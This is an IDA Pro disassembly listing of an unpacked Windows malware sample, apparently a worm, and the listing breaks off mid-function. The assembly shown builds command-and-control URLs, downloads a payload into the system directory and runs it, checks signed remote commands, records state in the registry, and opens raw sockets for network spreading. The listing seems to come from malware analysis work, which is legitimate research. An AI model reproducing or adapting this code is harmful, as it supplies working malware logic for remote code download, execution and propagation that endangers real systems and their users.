; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 4B39FA6389603CD4546AF7C9549278D2 ; File Name : u:\work\4b39fa6389603cd4546af7c9549278d2_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31430000 ; Section 1. (virtual address 00001000) ; Virtual size : 00005000 ( 20480.) ; Section size in file : 00005000 ( 20480.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31431000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31431000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31431004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31431008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3143100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31432A49+1Dr dword_31431010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31431014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31432A49+4Er ... dword_31431018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3143101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31431020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31431024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31431028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3143102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31431030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31431034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31431038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h dword_31431040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31431044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31431048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3143104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31431050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31431054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31431058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3143105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31431060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31431064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31431068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31432D2E+8Fr dword_3143106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31431070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31431074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31432C62+Fr dword_31431078 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_3143107C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31431080 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314311A0+F6r ... dword_31431084 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_3143237F+57r dword_31431088 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_3143141F+64r ... dword_3143108C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31432C62+40r dword_31431090 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31432C62+1Br dword_31431094 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchange ; sub_3143185D+1r dword_31431098 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_3143109C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_314319BC+16Cr ... dword_314310A0 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314310A4 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314310A8 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31431FAB+2Cr dword_314310AC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_3143256D+124r dword_314310B0 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314310B4 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31432AF5+92r dword_314310B8 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:314324F1r dword_314310BC dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314310C0 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314310C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_3143210D+12r dword_314310C8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314310CC dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314310D0 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314310D4 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_3143237F+66r ... dword_314310D8 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3143278A+3Er ... dword_314310DC dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314310E0 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314310E4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31432C62+C3r dd 0 dword_314310EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314310F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314310F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314310F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314310FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_3143212E:loc_3143213Fr ... ; --------------------------------------------------------------------------- loc_31431100: ; DATA XREF: UPX0:loc_31432EA0r xchg eax, esp pop esp retn ; --------------------------------------------------------------------------- db 77h dword_31431104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3143141F+1A0r ... dword_31431108 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_3143110C dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_3143141F+B4r dd 0 dword_31431114 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31431118 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_3143111C dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_31431120 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31431782+5Dr ... align 8 dword_31431128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31431782+9Dr dword_3143112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31431782+89r dword_31431130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31431134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31432967r dword_31431138 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31431782+B0r align 10h dword_31431140 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31431144 dd 71AB3E00h ; resolved to->WS2_32.binddword_31431148 dd 71AB88D3h ; resolved to->WS2_32.listendword_3143114C dd 71AC1028h ; resolved to->WS2_32.acceptdword_31431150 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31431154 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31431158 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_3143115C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_3143237F+ACr dword_31431160 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_314328D7+Dr dword_31431164 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_3143237F+F0r dword_31431168 dd 71AB406Ah ; resolved to->WS2_32.connectdword_3143116C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31432239+67r ... dword_31431170 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_314319BC+1D8r ... dword_31431174 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31432239+128r dword_31431178 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31432239+12Fr align 10h dword_31431180 dd 0FFFFFFFFh, 0 dd offset nullsub_1 align 10h dword_31431190 dd 0FFFFFFFFh, 0 dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314311A0 proc near ; CODE XREF: sub_3143141F+172p var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_3143112C ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314311CB push 1 jmp loc_31431261 ; --------------------------------------------------------------------------- loc_314311CB: ; CODE XREF: sub_314311A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_31431090 ; GetSystemDirectoryA mov edi, dword_3143108C lea eax, [ebp+var_110] push offset dword_314341F8 push eax call edi ; lstrcatA lea eax, [ebp+var_110] push 6 push eax call dword_31431088 ; lstrlenA lea eax, [ebp+eax+var_110] push eax call sub_3143212E pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314341F0 push eax call edi ; lstrcatA push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31431084 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31431241 push 2 jmp short loc_31431261 ; --------------------------------------------------------------------------- loc_31431241: ; CODE XREF: sub_314311A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31431128 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31431264 push [ebp+var_4] call dword_31431080 ; CloseHandle push 3 loc_31431261: ; CODE XREF: sub_314311A0+26j ; sub_314311A0+9Fj pop eax jmp short loc_314312B5 ; --------------------------------------------------------------------------- loc_31431264: ; CODE XREF: sub_314311A0+B4j mov edi, 100000h push edi call sub_31432E6C mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31431138 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_3143107C ; WriteFile push [ebp+var_4] call dword_31431080 ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_3143215E push ebx call sub_31432E80 add esp, 0Ch xor eax, eax loc_314312B5: ; CODE XREF: sub_314311A0+C2j pop edi pop esi pop ebx leave retn sub_314311A0 endp ; =============== S U B R O U T I N E ======================================= sub_314312BA proc near ; CODE XREF: sub_3143141F+103p ; sub_3143141F+1DEp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch cmp [esp+arg_8], 0 jle short locret_31431312 mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314312D8: ; CODE XREF: sub_314312BA+53j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl shl bl, 4 xor dl, bl add eax, 3 mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, [esp+0Ch+arg_8] jl short loc_314312D8 pop edi pop esi pop ebx locret_31431312: ; CODE XREF: sub_314312BA+5j retn sub_314312BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431313 proc near ; CODE XREF: sub_31431398+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31431346 add ebx, 1Ah loc_31431346: ; CODE XREF: sub_31431313+2Ej movsx edi, [ebp+arg_0] mov esi, dword_3143110C lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31431370 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31431393 ; --------------------------------------------------------------------------- loc_31431370: ; CODE XREF: sub_31431313+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31431390 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31431393 ; --------------------------------------------------------------------------- loc_31431390: ; CODE XREF: sub_31431313+68j mov al, [ebp+arg_0] loc_31431393: ; CODE XREF: sub_31431313+5Bj ; sub_31431313+7Bj pop edi pop esi pop ebx leave retn sub_31431313 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431398 proc near ; CODE XREF: sub_3143141F+E0p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314313F5 mov edi, [ebp+arg_0] push ebx loc_314313AD: ; CODE XREF: sub_31431398+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31431313 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314313D9 cmp bl, 7Ah jg short loc_314313D9 movsx esi, bl sub esi, 61h loc_314313D9: ; CODE XREF: sub_31431398+34j ; sub_31431398+39j cmp bl, 41h jl short loc_314313E9 cmp bl, 5Ah jg short loc_314313E9 movsx esi, bl sub esi, 41h loc_314313E9: ; CODE XREF: sub_31431398+44j ; sub_31431398+49j mov eax, [ebp+arg_4] mov al, [eax] test al, al jnz short loc_314313AD pop ebx jmp short loc_314313F8 ; --------------------------------------------------------------------------- loc_314313F5: ; CODE XREF: sub_31431398+Fj mov edi, [ebp+arg_0] loc_314313F8: ; CODE XREF: sub_31431398+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_31431398 endp ; =============== S U B R O U T I N E ======================================= sub_314313FF proc near ; CODE XREF: sub_3143141F+10Fp ; sub_3143141F+1FCp arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31431403: ; CODE XREF: sub_314313FF+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31431403 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_314313FF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3143141F proc near ; CODE XREF: sub_31431782+BAp var_1EC = dword ptr -1ECh var_1E8 = byte ptr -1E8h var_1CC = byte ptr -1CCh var_1B8 = dword ptr -1B8h var_1B4 = byte ptr -1B4h var_184 = dword ptr -184h var_180 = dword ptr -180h var_17C = dword ptr -17Ch var_178 = byte ptr -178h var_174 = byte ptr -174h var_16C = byte ptr -16Ch var_168 = byte ptr -168h var_138 = dword ptr -138h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = byte ptr -128h var_120 = byte ptr -120h var_20 = dword ptr -20h var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31431180 push offset loc_31432EA0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 1DCh push ebx push esi push edi mov [ebp+var_12C], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31431104 ; strstr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314315B7 add esi, 4 mov [ebp+var_134], esi jz loc_314315B7 push esi call dword_31431088 ; lstrlenA mov [ebp+var_20], eax cmp eax, 50h jle loc_314315B7 lea eax, [esi+100h] mov cl, [eax] mov [ebp+var_174], cl and byte ptr [eax], 0 mov al, [esi] mov [ebp+var_16C], al movsx ebx, al sub ebx, 61h mov [ebp+var_130], ebx js loc_314315AB cmp ebx, 1Ah jge loc_314315AB inc esi mov [ebp+var_134], esi push 7Eh push esi call dword_3143110C ; strchr pop ecx pop ecx mov edi, eax mov [ebp+var_138], edi test edi, edi jz loc_314315AB mov al, [edi] mov [ebp+var_178], al and byte ptr [edi], 0 push ebx push esi lea eax, [ebp+var_120] push eax call sub_31431398 mov al, [ebp+var_178] mov [edi], al lea esi, [edi+1] mov [ebp+var_134], esi push 30h lea eax, [ebp+var_168] push eax lea eax, [esi+1] push eax call sub_314312BA lea eax, [ebp+var_168] push eax call sub_314313FF add esp, 1Ch cmp [esi], al jnz short loc_314315AB push 44h push offset dword_31434000 lea eax, [ebp+var_128] push eax call sub_314318EA add esp, 0Ch lea eax, [ebp+var_1C] push eax push 30h lea eax, [ebp+var_168] push eax lea eax, [ebp+var_120] push eax call dword_31431088 ; lstrlenA push eax lea eax, [ebp+var_120] push eax lea eax, [ebp+var_128] push eax call sub_31431955 add esp, 18h test eax, eax jnz short loc_3143159E cmp [ebp+var_1C], eax jz short loc_3143159E lea eax, [ebp+var_120] push eax call sub_314311A0 pop ecx and [ebp+var_12C], 0 loc_3143159E: ; CODE XREF: sub_3143141F+164j ; sub_3143141F+169j lea eax, [ebp+var_128] push eax call sub_31431939 pop ecx loc_314315AB: ; CODE XREF: sub_3143141F+9Bj ; sub_3143141F+A4j ... mov al, [ebp+var_174] mov [esi+100h], al loc_314315B7: ; CODE XREF: sub_3143141F+4Ej ; sub_3143141F+5Dj ... push offset aZer1 ; "zer1" push [ebp+arg_0] call dword_31431104 ; strstr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_31431763 add esi, 4 mov [ebp+var_134], esi push esi call dword_31431088 ; lstrlenA mov [ebp+var_20], eax cmp eax, 5Ah jle loc_31431763 push 0Ch lea eax, [ebp+var_184] push eax push esi call sub_314312BA push 30h lea eax, [ebp+var_1B4] push eax lea eax, [esi+13h] push eax call sub_314312BA lea eax, [ebp+var_1B4] push eax call sub_314313FF add esp, 1Ch cmp [esi+12h], al jnz loc_31431763 push 44h push offset dword_31434000 lea eax, [ebp+var_128] push eax call sub_314318EA lea eax, [ebp+var_1C] push eax push 30h lea eax, [ebp+var_1B4] push eax push 0Ch lea eax, [ebp+var_184] push eax lea eax, [ebp+var_128] push eax call sub_31431955 add esp, 24h test eax, eax jnz loc_31431756 cmp [ebp+var_1C], eax jz loc_31431756 push 7 pop ecx mov esi, offset aSoftwareMicros ; "Software\\Microsoft\\Wireless" lea edi, [ebp+var_1E8] rep movsd mov eax, dword_3143426C mov [ebp+var_1B8], eax push 13h lea eax, [ebp+var_1CC] push eax lea eax, [ebp+var_1B8] push eax lea eax, [ebp+var_1E8] push eax mov esi, 80000002h push esi call sub_31432A49 add esp, 14h test eax, eax jnz short loc_314316CF lea eax, [ebp+var_1CC] push eax call dword_31431108 ; atoi pop ecx mov [ebp+var_1EC], eax jmp short loc_314316D6 ; --------------------------------------------------------------------------- loc_314316CF: ; CODE XREF: sub_3143141F+298j and [ebp+var_1EC], 0 loc_314316D6: ; CODE XREF: sub_3143141F+2AEj mov eax, [ebp+var_184] cmp [ebp+var_1EC], eax jnb short loc_3143174F mov [ebp+var_1EC], eax push eax push offset aD ; "%d" lea eax, [ebp+var_1CC] push eax call dword_31431120 ; wsprintfA add esp, 0Ch lea eax, [ebp+var_1CC] push eax call dword_31431088 ; lstrlenA inc eax push eax lea eax, [ebp+var_1CC] push eax lea eax, [ebp+var_1B8] push eax lea eax, [ebp+var_1E8] push eax push esi call sub_31432AA2 add esp, 14h cmp dword_31435048, 0 jnz short loc_3143173E push [ebp+var_180] jmp short loc_31431744 ; --------------------------------------------------------------------------- loc_3143173E: ; CODE XREF: sub_3143141F+315j push [ebp+var_17C] loc_31431744: ; CODE XREF: sub_3143141F+31Dj push offset dword_3143504C call dword_31431094 ; InterlockedExchange loc_3143174F: ; CODE XREF: sub_3143141F+2C3j and [ebp+var_12C], 0 loc_31431756: ; CODE XREF: sub_3143141F+247j ; sub_3143141F+250j lea eax, [ebp+var_128] push eax call sub_31431939 pop ecx loc_31431763: ; CODE XREF: sub_3143141F+1B2j ; sub_3143141F+1CEj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_12C] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_3143141F endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431782 proc near ; CODE XREF: sub_3143185D+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31432E6C pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31431098 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_314317EA lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_3143502C push dword_31435044 push offset aKtgvjlfibo ; "ktgvjlfibo" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_31431120 ; wsprintfA add esp, 1Ch jmp short loc_31431802 ; --------------------------------------------------------------------------- loc_314317EA: ; CODE XREF: sub_31431782+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_31431120 ; wsprintfA add esp, 0Ch loc_31431802: ; CODE XREF: sub_31431782+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_3143112C ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31431128 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31431138 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_3143141F push esi call sub_31432E80 mov esi, dword_31431130 pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_31431782 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_3143185D proc near ; DATA XREF: sub_3143256D+169o push ebx mov ebx, dword_31431094 push esi push edi loc_31431866: ; CODE XREF: sub_3143185D+88j xor esi, esi mov edi, 46021h loc_3143186D: ; CODE XREF: sub_3143185D+86j inc esi inc esi call sub_314321F3 test eax, eax jz short loc_314318B7 mov al, byte_31434080[esi+esi*4] push eax push off_31434081[esi+esi*4] call sub_31431782 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314318B7 push 0 push offset dword_31435044 call ebx ; InterlockedExchange push 0 push offset dword_3143502C call ebx ; InterlockedExchange loc_314318B7: ; CODE XREF: sub_3143185D+19j ; sub_3143185D+46j call dword_314310FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31432223 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_3143109C ; Sleep cmp esi, 16h jb short loc_3143186D jmp loc_31431866 sub_3143185D endp ; =============== S U B R O U T I N E ======================================= sub_314318EA proc near ; CODE XREF: sub_3143141F+129p ; sub_3143141F+21Bp arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31431034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_31431917 push 8 push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_31431917 push 1 pop eax jmp short loc_31431935 ; --------------------------------------------------------------------------- loc_31431917: ; CODE XREF: sub_314318EA+19j ; sub_314318EA+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31431038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_31431935: ; CODE XREF: sub_314318EA+2Bj pop edi pop esi pop ebx retn sub_314318EA endp ; =============== S U B R O U T I N E ======================================= sub_31431939 proc near ; CODE XREF: sub_3143141F+186p ; sub_3143141F+33Ep arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3143102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31431030 ; CryptReleaseContext xor eax, eax pop esi retn sub_31431939 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31431955 proc near ; CODE XREF: sub_3143141F+15Ap ; sub_3143141F+23Dp arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3143101C ; CryptCreateHash test eax, eax jnz short loc_3143197B push 1 pop eax jmp short loc_314319B8 ; --------------------------------------------------------------------------- loc_3143197B: ; CODE XREF: sub_31431955+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31431020 ; CryptHashData test eax, eax jnz short loc_31431994 push 2 pop edi jmp short loc_314319AD ; --------------------------------------------------------------------------- loc_31431994: ; CODE XREF: sub_31431955+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31431024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314319AD: ; CODE XREF: sub_31431955+3Dj push [ebp+arg_0] call dword_31431028 ; CryptDestroyHash mov eax, edi loc_314319B8: ; CODE XREF: sub_31431955+24j pop edi pop esi pop ebp retn sub_31431955 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314319BC proc near ; CODE XREF: sub_31432728+35p ; sub_3143278A+47p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31432EC0 mov eax, dword_31434CAC push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31434CB0 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_3143115C ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31431F1C push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_31431160 ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax call dword_314310A0 ; lstrcpynA lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31434CA0 push eax call dword_31431120 ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31431A2F: ; CODE XREF: sub_314319BC+83j mov 